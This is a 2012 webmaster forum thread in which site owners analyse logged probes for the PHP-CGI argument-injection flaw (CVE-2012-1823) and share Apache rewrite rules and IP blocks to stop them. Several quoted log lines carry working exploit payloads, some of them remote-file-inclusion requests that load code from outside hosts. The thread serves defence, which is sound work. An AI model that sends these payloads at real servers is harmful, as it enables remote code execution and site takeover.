homepage Welcome to WebmasterWorld Guest from
register, free tools, login, search, subscribe, help, library, announcements, recent posts, open posts,
Pubcon Website
Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

what is this POST command and why did it get a 200?

 2:37 pm on May 22, 2012 (gmt 0)

The following showed up in my log. I have no idea what it is doing. Also, this is the only entry in the log for IP - - [22/May/2012:02:58:02 -0600] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 200 6835 "-" "Mozilla/3.0 (windows)"

The IP hasn't accessed anything on my site so I don't even know what it is posting in response to.
It looks to me as if it is trying to do something destructive, but I am only guessing.

(I am unsure which forum topic this question belongs in.)



 8:58 pm on May 22, 2012 (gmt 0)

That specific IP had a go at my server a couple of days ago. It got rejected but tried 3 times in all.

All three hits were with the UA...
Mozilla/3.0 (windows)
...same as a hit 15 minutes earlier from an AT&T IP (also blocked) and probably others.

I don't log POSTs in my security logs (they can be far too long!). The QUERYSTRING is the same though, but only on the second and third hits, not the first, which was probably just establishing contact.

I would guess it was trying to add something nsty into a php file on the site. Whether it could succeed depends on how you handle such things - or even whether your site is php in the first place. :)


 11:08 pm on May 22, 2012 (gmt 0)

Dstiles: thanks for the reply. I blocked that IP as soon as I saw the log reference.
Is there any way I can determine which php file was involved (short of examining every one of them)?


 11:22 pm on May 22, 2012 (gmt 0)

From the topic header:
why did it get a 200

Was it supposed to get a 403? I've had similar headscratchers, and they tend to come down to UA rewrites. For example, if a nasty robot pretends to be MSIE 5, it will get rewritten to a special page. So it may never meet the later rules that would have kicked in if a normal UA had made the same request.

There are other possible explanations, but they all come down to: Even though logs say 200, your visiting nasty didn't actually get what it wanted.


 11:29 pm on May 22, 2012 (gmt 0)

The /?- start suggests that the root index file was involved.


 11:55 pm on May 22, 2012 (gmt 0)

dupres01 - I would FTP to your account and have a look at files on your server, in particular the PHP folder to see if there have been any new files added. Also you might take a look at the HTML of your online index page and a couple of the other landing pages for any added code, usually at the top or the very bottom.


 12:05 am on May 23, 2012 (gmt 0)

Had the same request two days ago: - - [20/May/2012:22:53:37 +0100] "POST /?-dallow_url_include%3don+-dauto_prepend_file%3dphp://input HTTP/1.1" 403 533 "-" "Mozilla/3.0 (windows)"

was denied based upon incorrect case or syntax on "Windows"


 12:13 am on May 23, 2012 (gmt 0)

I see that I bounced it purely on the use of underscores in the URL request.

I never use underscores in URLs. This ruling also has the handy effect of blocking direct access to PHP include files as their file names often do have underscores.

If that rule hadn't been there, then the combination of POST and "php" in the URL would have kicked it to the kerb anyway.


 1:15 am on May 23, 2012 (gmt 0)

I never use underscores in URLs.

Don't recall that I ever have either, although I used one on Saturday for a temp-file-trivia.

What syntax do you use for the denial?


 1:21 am on May 23, 2012 (gmt 0)

I block "prepend" and "append" anywhere from incoming requests, although I do it myself on the server.


 1:36 am on May 23, 2012 (gmt 0)

Block requests with underscore in path:
RewriteRule _ - [F]

I redirect requests with parameters over to extensionless URLs. The RegEx patterns that capture the parameter values usually allow only lower case letters, numbers and hyphens. Everything else will lead to a 404 error at the very least.


 8:42 am on May 23, 2012 (gmt 0)

That looks like an attempt to exploit the vulnerability in some PHP-as-CGI setups, which was discussed here and elsewhere a couple of weeks ago.


It tries to use the PHP -d flag to set two php.ini entries.

The request got a 200 response because it was basically just a request for your home page, with the maliciously-intentioned query string added.

grandma genie

 2:09 am on May 24, 2012 (gmt 0)

I have also gotten a similar type of log entry.

177.8.168.n - - "POST //?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.1" 302 - "-" "-"

And just now I found an entry that seems in some odd way connected. This visitor has sucuri.net as its initial referer (although that could be bogus). But the IP is coming from linode. And the UAs are bogus. Here are some samples:

97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example HTTP/1.1" 301 249 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET /example/ HTTP/1.1" 200 22302 "http://www.google.com/images/url" "googlebot"
97.107.135.nnn - - "GET / HTTP/1.1" 302 - "http://sucuri.net" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 198 "-" "Ipad Iphone Safari"
97.107.135.nnn - - "GET /example/php file HTTP/1.1" 302 - "h**p://www.bing.com/?s=bin" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 MSIE 7.0"

Just seemed odd that this visitor would go from a site about website security and malware to my ecommerce site that had recently seen an attempted exploit and then attempted its own exploit. Like it was doing some testing. Not sure if there is any connection at all, but just thought I would throw it out for your info.

By the way, the 302 redirects are happening, I believe, because my index.php file is a redirect.


 3:44 am on May 24, 2012 (gmt 0)


Two things with so-called visitor from 97.107.135.nnn:
1) why on earth are you allowing visitors with "fake google UA's" (especially this malformed one?

2) Linode is a server farm: -


 12:01 pm on May 24, 2012 (gmt 0)

OT: More ranges on LINODE server farm.

LINODE-US (NET6-2600-3C00-1) 2600:3C00:: - 2600:3C03:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
LINODE-US (NET-173-230-128-0-1) -
LINODE-US (NET-173-255-192-0-1) -
LINODE-US (NET-50-116-0-0-1) -
LINODE-US (NET-66-228-32-0-1) -
LINODE-US (NET-69-164-192-0-1) -
LINODE-US (NET-72-14-176-0-1) -
LINODE-US (NET-74-207-224-0-1) -
LINODE-US (NET-96-126-96-0-1) -
LINODE-US (NET-97-107-128-0-1) -


 9:17 pm on May 24, 2012 (gmt 0)

I have a couple of extras on that list... - - - - - - - - (UK) - - -


 11:34 am on May 25, 2012 (gmt 0)

2012-05-24 19:17:11 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914) Online LLC) trying to inject info3.txt from - server farm)


 8:18 pm on May 25, 2012 (gmt 0) - not just any server farm. Although only blocked by me in January this year my notes say "listed in uce-protect Level 2 as banned (ie for spam) - robtex claims RU, DNS claims CH and registration address is PA (Panama)". There is no rDNS for the specific IP, unusual for a server farm.

I have the complete blocked for the above reasons. It looks very dodgy to me.

Verizon is such a large range ( that anything could happen there - and frequently does. Haven't had so many this year but last year over 50 IPs blocked within that range, some for multiple offences. In all I have blocked around 450 verizon IPs over the past couple of years. Not as bad as Comcast (990) but still nasty.

grandma genie

 6:19 am on Jun 29, 2012 (gmt 0)

Just as a little follow-up, here is a sampling of log entries of a similar nature. This is just for your information.

74.55.62.nn - - [03/Jun/2012:13:48:36 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.nnn/sites/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

91.224.160.nnn - - [03/Jun/2012:23:37:41 -0400] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 403 - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; de) Opera 11.51"

85.92.83.nnn - - [05/Jun/2012:10:45:05 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://109.68.72.nn/icons/api.gif%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

190.60.44.nnn - - [19/Jun/2012:19:54:26 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.803"

213.190.161.nnn - - [23/Jun/2012:12:00:39 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/5.805"

200.62.177.nn - - [25/Jun/2012:12:55:27 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/id.txt%20-n HTTP/1.1" 403 - "-" "Mozilla/5.0"

70.84.108.nn - - [25/Jun/2012:17:00:29 -0400] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://64.109.183.nn/bin/acesso.txt%20-n HTTP/1.1" 403 - "-" "libwww-perl/6.04"


 11:49 pm on Jun 29, 2012 (gmt 0)

It has been going on for a while. They are after the latest PHP-CGI remote code execution bug (CVE-2012-1823).


When PHP is used in a CGI wrapper, remote attackers may use command-line switches, such as -s, -d or -c, in a query string that will be passed to the PHP-CGI binary, leading to arbitrary code execution or source code disclosure.


If you are vulnerable the following directive might help:

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
RewriteRule (.*) - [F,L]

Most of them will try a RFI (Remote File Inclusion) which is a shell most of the time.


 11:54 pm on Jun 29, 2012 (gmt 0)

Couple of quick fixes:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+
RewriteRule .* - [F]


 1:44 pm on Jun 30, 2012 (gmt 0)

2012-06-30 GET /index.php -dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt 80 - HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0b;+Windows+NT+5.0;+.NET+CLR+1.0.2914)

Note that IP its pointing to is UP by one from my prev post on this. This is from a different site than the prev one.

Global Options:
 top home search open messages active posts  

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About
© Webmaster World 1996-2014 all rights reserved